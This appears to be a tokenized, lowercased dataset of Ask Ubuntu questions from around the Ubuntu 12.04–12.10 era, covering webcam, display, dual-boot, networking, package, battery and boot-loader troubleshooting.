/lib/modules/3.7.0-7-generic/modules.dep : no such file or directory fatal : could not load /lib/modules/3.7.0-7-generic/modules.dep : no such file or directory processing triggers for libc-bin ... ldconfig deferred processing now taking place
249772	ca n't capture video with cheese . ubuntu 12.10	on my asus n61da notebook with built-in webcamera no possibility to capture video with cheese . shooting photos fine , but when pushing `` record a video '' button , application freezes for a few seconds and then quit . terminal says : segmentation fault ( core dumped ) in skype everything working fine with my webcam . in guvcview my webcam showing only half of image from up to down . the second half of image is black/blank from the middle of my screen to the bottom . capture video in guvcview also impossible . seems to be it'is recording something but when done , i 'm running this video and there no sounds buy only animation like in windows media player some kind of screensaver .
249775	how to swap ctrl and fn on a lenovo thinkpad keyboard ?	i tried to exchange my fn key with left control , which did n't work . i used the command xev to get the keycodes/keysym . afterwards i used : xmodmap -e 'keycode 151=control_l' xmodmap -e 'keycode 37=xf86wakeup' but it did n't change anything . i also could n't create the .xmodmap to change the keys there . did i forget anything ? it did n't throw out an error .
249776	how can i delete a mail account in thunderbird ?	i missed one letter of my user name for my mail when add an account to thunderbird . my mail is reachable in webmail with my browser , but is unreachable in thunderbird . how do i delete an email account in thunderbird so that i can start again ?
249779	disable usb ports in ubuntu desktop except usb keyboard and mouse	i installed ubuntu 12.10 64 bit version in my system . i want to disable all the usb ports . except usb keyboard and mouse . i tried to add a line blacklist usb_storage in the /etc/modprobe.d/blacklist.conf and run the command sudo modprobe usb_storage . reboot the system . but still the usb port is detected . what is the problem ? anyone can help me to find the solution ?
249780	where to install libraries manually ?	i want to install sfml ( a free multimedia c++ api ) on my ubuntu system , which basically is n't a problem . but i wanted to know where i should store the files . i can see , that ubuntu stores my c++ standard libraries in /usr/include/c++ and so on.. my problem is , that i do n't know where i am supposed to leave the libraries or is there no place which should be used for this and i can move the files wherever i want ? all i am looking for is just some kind of a way `` how to do it right '' but i ca n't find an answer . i want my libraries to stay organized .
249783	can i use an old home directory in my new ubuntu installation ?	i 've installed ubuntu 12.10 and i did somethings wrong ( things that do not allow me to boot my system any more ) , when i installed it for the first time i used the following table of partition : one for the user files /home and one for every thing else ( / ) . so , i 'd like to know if i can install ( again ) the ubuntu 12.10 and use this old /home directory , can i ?
249788	guvcview ca n't capture video . ubuntu 12.10	notebook pc | asus n61da | ubuntu 12.10 | built-in webcam in guvcview my webcam showing only half of image from up to down . the second half of image is black/blank from the middle of my screen to the bottom . capture video in guvcview also impossible . seems to be it'is recording something but when done , i 'm running this video and there no sounds buy only animation like in windows media player some kind of screensaver .
249798	monitor setup and desktop background lost on restart	i have a lenovo z570 dual booting windows 7 and ubuntu 12.10 very happily . i love it , and i 'm fairly sure i want to switch permenantly . the laptop has a 1366x768px built in screen , and is connected to a second monitor , resolution 1680x1050px . at login , both screens are mirrored , and both screens are set to 1024x768px . on logging in , i can set the laptop screen to the correct resolution , but i had to use xrandr in command line to add the correct resolution for the second monitor . i also set a nice desktop background . on restarting , i get a window saying `` could not apply stored configuration for monitors '' . it 's back to mirroring at 1024x768 , and my desktop background is gone . how can i get the correct resolution at login , keep my desktop background , and not have to mess around in a terminal window every time i reboot ? any help greatly appreciated !
249799	how to adjust text color , contrast in all system features & apps ?	why is there no system directory where a person might access all system utilities , like background , text size , color , etc . must i download a separate utility for everything ?
249803	ubuntu live cd - persistance and install	if i were to use a ubuntu live usb with persistence for a while , and then when i am comfortable with it , choose to install it to a hard disk , will my persistent data transfer over ? or will i get a vanilla ubuntu install , as per the read only part of the live usb ? there is an exact duplicate ( one that i could find ) in if i have a live usb with persistence , if i install it , will the persistence be included , however the one answer there seems to be rather confused .
249808	why ca n't i resize/move in gparted ?	i have a 12.04 lts system running on my pc with a 320 gb hard drive . unfortunately , i need to use windows 7 in my lab . i tried doing this using a virtual machine ( virtualbox and vmware ) but it was not good enough . i want to make a partition on my hard drive so when the computer starts i 'll choose between windows 7 and 12.04 . i tried using gparted , but for some reason i 'm not getting the resize/move option . there must be a way that i can do this without formatting and installing everything again .
249819	ubuntu 12.10 issue : only wallpaper and curser appear , no menu or icons etc	i have installed ubuntu 12.10 on an old compaq n800v . it all seems fine , i get to log in ok , and then all i get is the wallpaper and the curser . i have tried resetting unity , by installing the right bits to allow the command 'unity-reset ' to function , but it errors horribly when i run it . any easy fix ? thanks
249823	sudo chmod -r 755 * accidentaly run in / , what are the options ?	i have many programs installed , i want to keep my history , and so on and so on.. what can i do to save the situation ? thank you .
249825	dual monitor problem	when i first installed 12.04 both monitors worked fine . i updated additional drivers and now i get this message . required virtual size does not fit available size : requested= ( 3840 , 1080 ) , minimum= ( 320 , 200 ) , maximum= ( 1920 , 1920 ) gdbus.error : org.gtk.gdbus.unmappedgerror.quark._gnome_2drr_2derror_2dquark.code3 : required virtual size does not fit available size : requested= ( 3840 , 1080 ) , minimum= ( 320 , 200 ) , maximum= ( 1920 , 1920 ) any ideas why ?
249826	how to disable internet connection for a single process ?	i know the pid of a specific process and i want to disable the internet access for this process and only for this process , so other process can access internet . is there any way to do it ? i googled some stuff and found a way to disable internet for executable programs . but i need , for example , to have two running chrome , one having access to internet and other not .
249828	command to see media file info in terminal ?	i need a command to quickly see in terminal essential information about an audio or video file . ( then i 'll consider adding that to thunar 's custom actions , etc . )
249830	how to get aero glass effect in unity ?	how can i enable an effect like aero glass in windows , applied to the unity dash and top panel in ubuntu 12.10 ?
249834	package 'samba ' is virtual - error when installing samba	i 'm trying to set up an ubuntu computer as a centralised storage for a few windows 7 computers on my network . i did a fresh install of ubuntu 12.10 . however , when i try to install samba through the terminal using sudo apt-get install samba , i get this error : package samba is not available , but is referred to by another package . if i try to install it by clicking on the directory i want to share , then checking `` share this folder '' to trigger the `` sharing service is not installed , install server '' dialogue box , it results in these errors : package 'samba ' is virtual . package 'libpam-smbpass ' is virtual . sharing service installation failed i ca n't seem to find any information online about these errors - can someone help ?
249835	ubuntu 10.04 server delay when post to mysql	i have a ubuntu 10.04 server and for some reason it always seems to exhibit an intermittent delay whenever performing crud operations on the mysql database . most post commands are executed within a normal amount of milliseconds , but when there is a delay it always seems to be for about 4.5 seconds . this is not a busy , public server so it should n't be a matter of server load being the problem . the best way for you to understand what i am trying to explain is for me to show you . so without further delay , please take a quick look at these couple of short videos : video 1 video 2 can anyone give me any ideas why this is happening and what to try to resolve it ?
249838	unable to mount location ca n't mount file	i am new to ubuntu . i installed ubuntu 12.10 and then at the installation process defined the partition and mount parameters . e.g . /dev/sda1 /dev/sda2 /dev/sda3 so on ... but after the installation is completed , system is not showing the drives as expected . there was a single drive listed name 500 gb hard disk . on selecting this drive its giving me the error mentioned in the title . i searched some answers from the askubuntu forums and here . but i am unable to mount the drive still . any help would be greatly appreciated .
249845	setting up xen vga passthrough with two different video card	while i have learned that you must use two different video cards to utilize xen 's vga passthrough , i am curious if you can do this with different video cards from the same manufacturer . specifically , i would like to utilize the following setup : xubuntu radeon 4870 radeon 7870 my goal is to have triple monitors on the linux host os ( 7870 allows this via mini-displayport ) . then , i want to be able to launch a vm of windows that has direct access to a single video card for gaming ( probably on the 4870 ) . a bonus would be to have the host system utilize 2 displays on the 4870 and 1 on the 7870 , so that the 7870 could be used for the gaming vm ( w/ that monitor switching to the vm ) . i think i 'm reaching a bit far with this bonus though . any working configuration that allows triple monitors with a gaming windows vm ( even if it uses the 4870 ) would be great !
249847	how do i overcome this `` group 'libvirtd ' does not exist '' issue in installing juju ?	i 'm trying to install juju on local environment . for that i installed ubuntu server 12.10 and i followed this juju getting started tutorial . at the step where i run the following command : sudo usermod -a -g libvirtd < your_user > the error is reported : usermod : group 'libvirtd ' does not exist does someone have ever had this problem and can help me ?
249851	change mtp default action when connecting to ubuntu	the first time i 've connected my smartphone to ubuntu , it asked me about the default action each time i 'll connect it . now the default action is to open nautilus . how do i change it to not do anything or ask me what to do ?
249853	rysnc errors , backup with deltacopy and ubuntu	i have several windows machines that are using deltacopy and rysyc to back up via ssh to an ubuntu machine . half of the backups will run , the other half will not . here 's an example of one of the errors . even with a manual run the backups do not execute : rsync : read error : connection reset by peer ( 104 ) rsync error : error in rsync protocol data stream ( code 12 ) at /home/lapo/packaging/rsync-3.0.4-1/src/rsync-3.0.4/io.c ( 791 ) [ sender=3.0.4 ] generic error occurredrsync.exe returned an error . will try again .
249855	how to get file preview pane in ubuntu 12.04 and nautilus	it seems like the default file manager in ubuntu 12.04 is nautilus , that does not have a file preview option ! this is a really important requirement for me and i am missing the good old file preview pane in windows 7 or mac os x . there are a few options in ubuntu for instance ; gloobus-preview but then it is activated when we press the space-bar and the preview occupies the center of the screen , so it almost blocks the view . now , is there any way i can install an add-on , maybe to the nautilus manager in ubuntu 12.04 and get this side-pane for previewing files . what are the other options available otherwise ?
249858	âquickly tutorial ubuntu-applicationâ not working	i installed quickly with sudo apt-get install quickly . if i want to read the tutorial with quickly tutorial ubuntu-application i get the following error message : fehler : no tutorial command found . candidate commands are : commands , getstarted , help , quickly also if i try quickly create ubuntu-application foobar , i get a similar message : fehler : no create command found . candidate commands are : commands , getstarted , help , quickly
249860	execute a jar at console from another folder	i 'm writing a python script which at certain point needs to launch a jar file . so i was thinking about making a system call with command : './myjarfile.jar' the problem is that i have that jar in a different folder . so i tried : './home/users/myuser/myfolder/myjarfile.jar' which does n't work at console . also tried using java binary : 'java /home/users/myuser/myfolder/myjarfile.jar' which does n't work either . any help ?
249862	storing thousands of files in one directory	i have a web-site that i 'm checking for performance issues and bugs , and i came across a caching code that caches thousands of files into one single directory . i understand that this is not good and that i/o will degrade and i also heard about potential inode problem . and i know how to fix the caching code , but the thing is that at this point fixing would be very expensive . the question : what is the worst case scenario if i live it like it is right now ? how will happen to the website ? ( right now this one single cache directory has 400k files ) i 'm new to ubuntu . and i understand that this is might be an off-topic . but i think this is a `` system '' question and it does not belong to the 'programming ' part of the stackoverflow . thanks ! update : the file system is ufs
249863	how to turn off outgoing skype ringing sound ?	i hate the sound skype plays when you try to call someone . it literally drives me crazy . is there a way to turn off the sound ? i 'm using xubuntu 12.10 !
249867	how do you prevent cpus from being throttled when battery is taken out of laptop ( aka only on ac power ) ?	my laptop cpus are throttled down to .8ghz instead of 2.5ghz whenever i am connected to ac only and not the battery . i tried using cpufreq-set and it allows me to set the speed when the battery is connected but it stays at a maximum of .8ghz when the battery is disconnected . is there a way to prevent this ? update : i 've also tried changing the governor , but it seems locked at .8ghz whenever it 's on only ac power . are there any overrides for this ?
249870	can i replace new pc hd with my old pc 's ubuntu 12.04 hd	i just ordered a new pc with an i7-3770 & w8 so it will be uefi constrained . i have no interest in running windows and have a ubuntu 12.04 system configured exactly as i want it . can i remove the hd from the new pc when it arrives and swap in the ubuntu hd without a need to alter grub ? i 'm clueless about bios settings , altering grub or any of the growing list of things mentioned here to deal with the uefi issue and would very much appreciate any and all help in dealing with this . thank you ! ... dave
249871	puzzled about java and how to make it run in ubuntu 12.10	coming from windows and .net development world , i 'm trying to migrate to ubuntu 12.10 and java development world but i 'm getting very confused about : what is the most standard form to install java ee jdk ? should i download and run the shell script from oracle , use the packages at webupd8 ppa or install the openjdk packages ? what are the differences between oracle 's java and openjdk 's java ? can i think of them as like microsoft 's .net and mono project 's .net ? i 've installed oracle 's java using the shell scripts but how can i get the browsers to run java applets ? i 've installed icedtea java plugin but i'ts working only in some sites , others are halting firefox . by the way , what exactly are the icedtea java plugin ? it 's a java runtime implementation by its own or it is using the oracle 's java that 'ive installed like some kind of bridge to teach the browser how to get to the runtime ? this transition is n't easy as i expected . afff ! i appreciate any help !
249873	how to use wimax modem ?	i have a wimax 4g modem , but no activity in ubuntu 12.10 . how can i get a driver for this ? here 's full info on the device : banglalion wimax 5vdc , 300ma model name : wixubb-116x238bd fcc id : mxf-wixubb-116 mac : 20107a9cef64 s/n : bcl120821001932 made in china
249877	triple booting windows 7 , ubuntu 12.04 and windows 8	i need to try out win 8 and learn it , and i want to triple boot it ( because i 'm only going to use it when i have to ) with ubuntu and windows 7 already installed . the current boot loader is windows ' boot loader and i want to keep it that way . whether it is windows 8 or 7 's boot loader does n't matter , but i want to be able to boot all three with windows 7 as default . i also want to use an external drive for windows 8 . ( it 's connected through usb . ) can i keep/use any of the loaders that windows has and be able to link them all together , when windows 8 is on an external drive which is connected through usb ? if it works , but is slow or otherwise suboptimal , that 's fine . i read another post about this before asking but since i have a short supply of primary partitions i 'm willing to format to convert to logical i wanted to specify my question a bit .
249878	what is the proper way to setup an ubuntu openstack instance to run mysql ?	i am attempting to create an ubuntu instance on an openstack cloud . however , the basic images do n't allow for a large root ( / ) partition nor would that be common when deployed to public clouds . i have come to the idea that i should create a volume for persistent storage and tell mysql to use this for its data storage . however , i am not sure if that is conventional nor smart . also , would it be better to simply replace /var with the volume ( since it will save logs in addition to the database ) or should i create a custom directory with the volume dedicated only to mysql ? overall , what is an acceptable or conventional way to create an openstack ubuntu instance configured to host a mysql daemon with a good amount of persistent storage for the data ? note : this question has answers which will show me how to configure mysql so feel free to abstract those particular details out of any answer .
249881	how do i install globus toolkit 5.2 ?	i 'm doing a project on `` grid computing '' and more specifically on `` gram : job execution/resource management '' . i 'm using ubuntu 12.04 and trying to install `` globus toolkit 5.2.3 '' .
249886	how to organise my files ?	for my work i need to write a lot of small programs that read some date from some files and generate other files that are read by other programs and so on . very quickly the structure becomes so complex , that it is hard to recall what files the given program generates and by what program the given data were generated . to solve this problem i use graphviz package to visualize the structure of my file system ( in fact i have a directed graph that show what files my programs read and what files they write ) . i would like to ask you if there is program that can help to do it . or may be it can be done by means of the operation system ? in addition to this info ( what is written by what and what is read by what ) , it would be nice to have information about the syntax of the data files ( some how attached to the files ) as well as a short description of what my programs do .
249887	gconf , dconf , gsettings and the relationship between them	i 'm trying to understand how gconf , dconf and gsettings works and what the relationship is between them . all i know is : gconf - xml based database ( backend system ) . the older one . dconf - blob based database ( backend system ) . the newer one . gsettings - cli tool to edit settings . looks like it works only with dconf ( although i saw somewhere that it might work with gconf ) . i know that for gconf there is a gui - gconf-editor , and for dconf - dconf-editor . so : which backend system is more often used - dconf or gconf ? gsettings works with both of them ? and why does n't it show all dconf schemas ? where does dconf save its data ?
249889	installing ubuntu from usb - how to finish the installation	i 'm installing ubuntu 12.10 from usb and everything went fine , but on restart it opens the installation files , bacause the usb is there and if a remove it , the laptop acts if there is no os installed . how to make it to detect that ubuntu is actually there ? when to remove the usb ? please help : ( thanks in advance ! : )
249892	why wo n't ubuntu install , or even boot up the trial from my usb ?	i 'll paint the original situation : windows wo n't boot . trying to replace it with ubuntu so my laptop will work . now i have two usb sticks . one is about 1 gb , and the other is 8 gb , recently purchased for the purpose of installing ubuntu . i followed the directions laid out by the help files , and used the universal usb installer to install ubuntu onto both usb sticks . oddly enough though , the 8 gb stick will not boot even the trial of ubuntu on the laptop . meanwhile the 1 gb could ( that is , until something happened and i had to format it and it 's now only 556 mb ) . so to run the trial and unsuccessfully attempt to install it , i had to have both usbs plugged in at the same time . before it would n't let me install it , giving me various errors about partitions and /dev/sda . but now it wo n't even boot up at all . i 've gone to the bios screen and made it so it always tries to boot from the usb stick and still nothing happens . the 8 gb has ubuntu correctly installed onto it and it still refuses to boot up even a trial , let alone allow me to try to install . i just get a black screen . what is going on here ? i 'm not a computer expert so it would help if you can simplify any answers you can give . thanks .
249895	installing wine without internet	how to install wine application on ubuntu12.10 without internet . i have already downloaded wine 1.4 , but i do n't know how to install it.please be sure any answer for me .
249898	pc acting weird since dual-boot setup	i just came to think of something i 've noticed recently when rebooting my pc . if i reboot my pc from within an os , after installing software or something , it get 's stuck on the absolute first screen where you have the option of going into bios . this started happening a week ago or so and i 've never had this issue before and i assume it came from dual-booting . i think it may have come up after windows was put down in suspend-mode by accident ( my girlfriend does n't know swedish and though it said shut down ) and it never resumed from that suspended mode and i had to repair windows following that . ( this is one of the primary reasons i prefer ubuntu ) anyway , so i have windows 7 and ubuntu 12.04 installed . ubuntu works fine but since that stupid behaviour from windows 7 , neither os can reboot successfully . i have to shut the pc down and then boot it up again manually , or else it gets stuck on that first screen . any ideas or theories ? my theory may be completely wrong . i did n't think it was permanent the first time it happened because i thought it was related to windows acting like a child but it stuck with me and it 's bugging me a lot now actually .
249900	how do i change the background at boot time for ubuntu 12.04 ?	i have ubuntu 12.04 with gnome . i want to replace the background image of the screen where i 'm asked to choose between windows and ubuntu . i replaced this image /usr/share/images/desktop-grub/desktop-grub.png with another image at the same location with the same name . but now the screen has a blank background and does not display the new image .
249902	is nginx-extras supposed to have passenger compiled with it ?	from the way the launchpad description reads , the nginx-extras package should have the passenger module installed with it . however , when i install nginx-extras and try to enable passenger , i get the `` unknown directive 'passenger_root ' '' error that indicates the module is not installed . is this package intended to have the passenger module with it , or am i misreading the launchpad description ?
249906	how do i keep the ubuntu one sync daemon from automatically starting up ?	i have a windows xp vm solely for the purpose of using quicken . i have all my documents in my home folder including the quicken files , to which the vm sees via a samba share . if the ubuntu one sync daemon is running while i 'm using quicken , i can not edit or modify transactions due to however u1 locks the file . so i made a script to stop the u1 daemon before the vm starts , then start it back up again after the vm shuts down if it was running to begin with . all was working well , or so i thought . if i have a lot to do in quicken therefore having the vm open for longer than 20 minutes , the u1 sync daemon will start up again and start syncing my files , causing quicken to at least prevent me from editing anything and at worst locking up which forces me to shut it down and lose work . how can i prevent the daemon from starting again unless i tell it to ? below is the script i am currently using : # ! /bin/bash u1exist=yes u1running=no vm=a7a66504-3370-4462-89b1-25b5ee833528 vmcomment= '' windows xp '' # silly check , is virtualbox installed ? hash /usr/lib/virtualbox/virtualbox 2 > /dev/null || { echo > & 2 `` this is a wrapper script for virtualbox , which is not installed on this machine . aborting . `` ; exit 1 ; } # check to see if ubuntuone is even installed hash u1sdtool 2 > /dev/null || { u1exist=no ; } printf `` % s '' `` ubuntuone sync-daemon running : `` if [ `` $ u1exist '' == `` yes '' ] ; then # check to see if the sync-daemon is running ustat=`u1sdtool -s | awk 'begin { fs= '' `` } /is_connected/ { print $ 2 } '` if [ `` $ ustat '' == `` true '' ] ; then u1running=yes fi echo $ u1running else echo `` does not exist . '' fi if [ `` $ u1running '' == `` yes '' ] ; then echo `` turning off ubuntuone syncing while vm is running . do n't worry , we 'll turn it back on when the vm is shut down ! '' u1sdtool -q fi echo `` starting virtual machine ... '' /usr/lib/virtualbox/virtualbox -- comment $ vmcomment -- startvm $ vm if [ `` $ u1running '' == `` yes '' ] ; then # only turn u1 back on if it was running to begin with printf `` % s '' `` turning ubuntuone sync-daemon back on : `` u1sdtool -c echo `` done . '' fi edit : meant to include that i am using ubuntu 12.04 .
249909	after a new install of ubuntu 14	i have a hp dc5800 with vmware workstation . new ubuntu installation worked perfect . i cancelled the language selection because i had no internet connection to the virtual machine . ubuntu asked me to do a 251 updates . after the restart from those updates ubuntu hangs on battery check ok. with alt+f2 and startx i got into the system . the second problem i found was that the system asked me for a password when i type startx . because the password is not accepted i get a second option to log on , this time with a login name field first . i choose administrator ( did i choose did with setup , or is it default like in windows ) and type my password . directly i am in and type startx again . i am asking myself what was the user accound for the first logon try ( it is not saying ) . with the full language support i get the same problem . asking me for a password without telling me which user it wants . after several tries the system still complains about being incomplete , but i see that the english language is installed ( the one i wanted ) . then i got an empty desktop with no options . i have to crash the virtual machine to get somewhere . extra : while updating it told me that a part was ended unexpected ( compiz ) , but not enough memory to send a report to the developers . hope somebody has an idea .
249910	how can i reduce the file size of a video from the command-line ?	i want to reduce the size of a video size . the video may be .flv , .avi , etc . i want it done from the terminal . how can i do that ?
249911	restore audio settings - can not open mixer : no such file or directory	the internal speaker of my laptop never functionned under ubuntu . i tried to follow indication on the web and now the jack audio does not work either . the graphic interface for audio management now displays a 'dummy output ' instead of the three possible outputs i used to have ( one of them was working for the jack output ) . in a terminal alsamixer raises an error : can not open mixer : no such file or directory i did try to remove and reinstall alsa-utils but it did not change anything . this happened after a failed atempt to install alsa-driver-linuxant_1.0.23.1_all.deb from here . my sound card seems to be not recognised anymore . after reboot i have no more the sound icon in menu bar the upper right corner . i think i have removed my sound card driver . indeed , the command sudo lshw -class multimedia indicated audi device as unclaimed . any idea how i could revert to a better situation ( that is jack support and alsa working ) ? edit : the command lspci -nnk | grep -iea3 audio gives lspci -nnk | grep -iea3 audio 00:1b.0 audio device [ 0403 ] : intel corporation 82801i ( ich9 family ) hd audio controller [ 8086:293e ] ( rev 03 ) subsystem : asustek computer inc. device [ 1043:1893 ] 00:1c.0 pci bridge [ 0604 ] : intel corporation 82801i ( ich9 family ) pci express port 1 [ 8086:2940 ] ( rev 03 )
249914	removing pending orphan activities in landscape	i am using the hosted canonical landscape to manage my ubuntu servers . recently , i migrated an ubuntu 12.04.1 virtual machine from one host to another . after the migration , the server was unable to contact landscape . based on the landscape documentation , i removed the server from landscape , and re-registered it . it worked beautifully and the server is in contact with the service . however , while the server was out-of-touch , several `` resynchronize computer '' activities were created and were left in a pending or in progress status when the server was de-registered . they did not get removed when the server was removed from landscape . how can i remove these orphaned activities ? i have tried to manually cancel them , but the action buttons are greyed out when the task is opened . thank you .
249922	not returning focus to previously focused window	this has been bothering me a lot . when closing a window , the system does not give the focus to the previously focused window . let me give an example . right now , i 'm working with google chrome and it is focused ( active ) . i decide to open up nautilus and check a file . when i 'm done with nautilus , when i close it , it should automatically return the focus to google chrome ( previously focused window ) , but it does n't . no window is focused , not even desktop . is there a solution for this problem ? note : i 'm using unity 2d , but i do n't think this is the reason .
249925	notification panel in ubuntu gnome remix crashed how to start without reboot	i was writing some python code which interacts with dbus to do notification which works great . not sure what happened , but somewhere along the way the notification panel at the bottom crashed . i ca n't seem to figure out how to start it again . any idea what i can do to start it without rebooting ?
249927	how to stop the fluent change / switch between work spaces ?	i successfully got my laptop hooked up to my 22 inch monitor with the help of you in how do i setup dual monitors in xfce ? . it is pretty cool working on xubuntu on a big monitor ( in 1680 x 1050 px ) . : - ) due to some weird mouse cursor speed i am not ( yet ) accustomed to , i keep losing the cursor when i get to close the right edge of the screen . i already looked under in the settings under workspaces , window manager and window manager tweaks but was n't successful concerning the mouse cursor movement . my question : how can i ( temporarily ) disable the mechanic which enables all this ? while i disable this , can i still keep the shortcut ctrl + alt + right or ctrl + alt + left intact ?
249936	why does it appear that my linux file system is more fragile than my windows file system ?	i 've got my laptop in dual booting , and whenever i boot into linux ( ubuntu or linux mint ) , there 's a decent chance that it will run the file system check ( more than the default once every 30 times ) , and it 'll be a definite run if i 'm booting after letting the laptop run out of battery . this has happened over two different laptops . the windows partition on the other hand , never does anything visibly , so i was wondering : is it the case that the file system on my linux partition ( ext2/3 ) is more fragile than the file system on my windows partition ( ntfs ) ? is it the case that windows checks for errors and solves them in the background ? is it the case that windows does n't check for errors , and ubuntu is just more vigilant in terms of file system health ? thanks
249939	where are my themes ? i am in 12.04 logged on to gnome classic	i ran some commands in the terminal to download themes from internet but i dont know how to access them , they dont show up in appearance . these themes are for gdk3 and gnome
249944	how can i completely remove networkmanager ?	i want to disable networkmanager entirely , and have my eth0 and wifi connections unmanaged . my eth0 on my main linux box is unmanaged and i have no issues with it , i want to do the same to my other linux boxes all running ubuntu 12.04 lts , basically i want to kill network manager and never see any trace of it again .
249946	what is the release date of ubuntu 13.04 ( raring ringtail ) ?	what is the exact release date of ubuntu 13.04 raring ringtail ?
249953	how can i make a program open on my current worspace , instead of transfering to another instance ?	since i updated my 10.04 to 12.04 version of ubuntu i 've been dealing with a terrible curse : i used to have multiple workspaces , each with its own unique sets of same programs opened , and now , whenever i click an icon of a program that is already running on a different workspace , it automatically transfers me back to there , instead of triggering another instance of the program on my current one . i tried adapting , i tried searching `` how to make programs trigger on current workspace in ubuntu '' , but i have not yet found a definite answer to my questions . does anyone out there could give me any advice ? how to set them to trigger new instances by default ? i know that there is an option there but it does n't make things more intuitive , ai n't it ? thanks in advance !
249954	unable to print pdf correctly	when i try to print a pdf , it prints , but the first page has weird symbols replacing some of the letters ( notice that the symbols look similar to the letters that should be there ) : the second page is blank , except for this error message : error : undefined offending command : ... .undefined stack : 0 0 431 431 683 0 0 0 -194 0 0 0 0 0 0 -195 0 0 0 0 0 0 268 0 0 0 -mark- -mark- -mark- my printer is a brother hl-5150d . i can print documents from libreoffice just fine . the document had 5 pages , was generated by latex , and was printed using the standard document viewer ( evince ) . how can i fix the printer so it can print pdfs ? will a different printer driver or document viewer work ? edit : i 've been able to print my document correctly with the ocular document viewer ( see my own answer ) , but i still would like to be able to print it using the standard evince document viewer .
249957	ca n't apt-get update or install , ubuntu 10.10 , lxde , virtualbox vm . ca n't resolve us.archive.ubuntu.com	i know this has been asked before , but none of the previous answers have worked for me . i 'm on a nat connection on a virtualbox ubuntu vm ( and unfortunately because of certain networking circumstances , it 's unlikely i 'll be able to switch to a bridged connection ) . when i try to sudo apt-get install , or sudo apt-get update , it ca n't resolve us.ubuntu.archive.com . i 've tried switching to the argonne national labs mirror , in my /etc/apt/sources.list file , so i do n't think the mirror is the problem . unfortunately , while i 'd love to post the output , i 'm for some arcane reason unallowed to post more than 2 hyperlinks , thus making it very challenging for you to help me and seemingly defeating the purpose of this site . still , if you want any more information i will post follow-ups . edit : this was marked as duplicate . so i will say this is different because , again , none of the previous solutions seem to have worked . things i 've tried : editing nameserver to 8.8.8.8 - did n't fix anything changing all references of us.archive.ubuntu.com/ubuntu to the argonne national labs url , did not fix the problem . and i can not change to a bridged adapter due to networking security concerns . this means the solution has to be one that uses nat . edit 2 : whoever provided the possible duplicate link ( i may have missed it before ) , thanks ! that did the trick . how can i thank for the link ?
249960	last access timestamp updated every 24 hours	the last access timestamp of my files is updated every 24 hours whenever i access an files . e.g . i type `` ls '' and if the last access timestamp of the file is older than 24 it is updated to the current date . has anyone else the same phenomenon and any idea what is causing it . i have a ssd , perhaps it is related to this .
249961	i have an unstable internet connection	every time i get connected to the internet , no matter what , after some minutes , i get disconnected . my connection including my isp and modem and everything is all-alright because when i go to my windows 7 operating system everything works perfectly well .
249962	empathy notifications ? how open emphaty from envelope ?	well no , was no similar question . ok somebody start to chat me , i got envelope . when i click on it telepathy not empathy opens , always . well empathy looks better and has nicer ui . how to make empathy opening from envelope ? thanks if there is solution to this ; )
249963	problems with qml tool kit installation : `` unmet dependencies : qt-components-ubuntu : ... ``	i am following the directions on the page for ubuntu app development : http : //developer.ubuntu.com/get-started/gomobile/ command 1 : sudo add-apt-repository ppa : canonical-qt5-edgers/qt5-beta1 & & sudo apt-get update & & sudo apt-get install qt5-meta-full & & echo 'export path=/opt/qt5/bin : $ path ' > > ~/.bashrc output 1 : ... fetched 745 kb in 3s ( 204 kb/s ) reading package lists ... done reading package lists ... done building dependency tree reading state information ... done qt5-meta-full is already the newest version . the following packages were automatically installed and are no longer required : libtiff4 libtiffxx0c2 linux-headers-3.5.0-17 linux-headers-3.5.0-17-generic use 'apt-get autoremove ' to remove them . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . command 2 sudo add-apt-repository ppa : ubuntu-sdk-team/ppa & & sudo apt-get update & & sudo apt-get install qt-components-ubuntu qt-components-ubuntu-demos qt-components-ubuntu-examples qt-components-ubuntu-doc notepad-qml output 2 reading package lists ... done reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : qt-components-ubuntu : depends : libqt5core5 ( > = 5.0.0 ) but it is not installable depends : libqt5gui5 ( > = 5.0.0 ) but it is not installable depends : libqt5qml5 but it is not installable depends : libqt5quick5 but it is not installable e : unable to correct problems , you have held broken packages . as specified , i set the path to include /opt/qt5/bin . i was wondering if this issue was familiar to anyone . thanks a lot for your time .
249964	battery died , but it is recognized by the system as active and healthy	i 'm on an thinkpad x220 , ubuntu 12.10 , kernel 3.5.0.22 , recently updated bios ( 1.37 ) : today out of nowhere , my computer shuts down immediately when i unplug it , even though the battery is present , recognized and charged . it wo n't go beyond 66 % charged though . in power statistics , the battery is recognized as having a 37.2wh charge and as being healthy . the 'time to full value ' however , is 0 . power statistics : device : battery_bato technology : lithium ion vendor : lgc model : 42t4865 serial number : 10189 present : yes rechargeable : yes state : charging voltage : 11.9 v energy : 37.2 wh energy ( design ) 62.2 wh percentage : 66.2 % capacity : 90.4 % time to full : 0 seconds time to empty : 0 seconds i have tried unplugging the battery , reboot , replugging the battery , reboot as described in the answer here : and i have tried adjusting the settings of dconf editor ( in org > gnome > settings-daemon > plugins > power i changed the value of critical-battery-action to nothing . i have also unchecked the option notify-perhaps-recall ) , as described here : tried installing tp_smapi , as described here : when opening stop_charge_thresh , in /sys/devices/platform/smapi/bat0 ( there is also a folder for bat1 ) , i saw that the threshold for stopping charging was 100 . when opening start_charge_thresh , i am unable to open the file . in terminal i get this error : ( gedit:3617 ) : warning ** : hit unhandled case 0 ( error reading from file : no such device or address ) in parse_error . all to no avail , unfortunately . is this a broken battery ? or something else ? how can i find out ? update : the battery no longer shows in the system tray . i can however still find its specs and status with : upower -i /org/freedesktop/upower/devices/battery_bat0 thank you
249969	can not boot ubuntu 12.10 ( no wubildr / can not find grldr )	i 'm new to using ubuntu and installed it using wubi.exe on windows 8 . i created the partition , booted ubuntu and everything was fine . i shutdown my laptop for the night and when i attempted to boot ubuntu i got this screen : http : //imgur.com/ikgpvmo i 've searched the forums and found one answer saying to copy `` all 3 '' wubildr files into c\ , which i see only two ( wubildr and wubilder.mbr ) . also my grub folder is empty , there are no hidden files in it what-so-ever . please help ?
